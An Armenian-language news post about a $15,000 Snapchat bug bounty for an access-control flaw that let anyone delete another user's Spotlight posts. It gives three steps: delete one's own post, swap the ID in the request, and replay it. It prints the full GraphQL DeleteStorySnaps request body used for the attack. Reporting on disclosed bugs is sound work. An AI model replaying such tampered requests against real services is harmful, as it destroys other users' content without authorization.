Snapchat֊ը $15,000 է վճարել Bug Bounty ֊ի շրջանակներում

12-03-2023
Share
Snapchat֊ը $15,000 է վճարել Bug Bounty ֊ի շրջանակներում

Սնեփչաթը 15000$ գումար է վճարել հետազոտողին ով գտել է խնդիր, որը թույլ է տալիս ջնջել կամայական օգտատիրոջ Content Spotlight֊ները, ինչը ըստ CVSS հաշվարկի High (7 ~ 8.9) է։

Մեթոդը շատ պարզ է, բաղկացած է մի քանի քայլերից՝

  1. Պետք է մուտք գործել Սնեփչաթ
  2. Ընտրել սեփական Spotlight-նեից և սեղմել delete
  3. Այնուհետև փոխել հարցման միջի ids֊ը և կրկնել այն՝

{“operationName”:”DeleteStorySnaps”,”variables”:{“ids”:[“123456789“],”storyType”:”SPOTLIGHT_STORY”},”query”:”mutation DeleteStorySnaps($ids: [String!]!, $storyType: StoryType!) {\n deleteStorySnaps(ids: $ids, storyType: $storyType)\n}\n”}

 

Ահա և վերջ կամայական Spotlight կարելի է ջնջել իմանալով նրա id֊ն, իսկ ID֊ն իմանալը շատ հեշտ է։